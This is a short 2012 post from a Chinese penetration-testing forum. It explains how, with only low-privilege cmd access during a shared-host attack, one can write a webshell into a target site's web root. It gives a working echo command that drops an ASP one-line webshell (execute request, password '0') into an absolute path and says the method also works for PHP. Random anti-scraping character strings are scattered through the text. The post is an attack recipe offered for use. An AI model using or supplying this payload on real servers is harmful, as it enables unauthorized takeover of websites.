中国网络渗透测试联盟

标题: 旁注cmd低权限下拿webshell [打印本页]

作者: admin    时间: 2012-9-23 14:40
标题: 旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
( l* l, o+ {% G4 v. r1 |3 c, P/ C* L' p* b9 `. V
命令格式
* H7 q% t( b3 E) J
! y4 |1 i* Q, Q1 c+ K4 u& VEcho 语句 >目标站绝对目录
) Z4 J, r' H6 x; N# z+ g6 e8 k1 d" }; |% m
例如: / F6 {  X6 H1 A# g7 C& f

' D8 ?' `: N  O1 |- Cecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
. [% Q4 r7 ?/ Y- A3 O  h. y* _; F/ f4 B, X  D- @
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
9 @' C7 i7 M, H1 u& z" V3 L




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2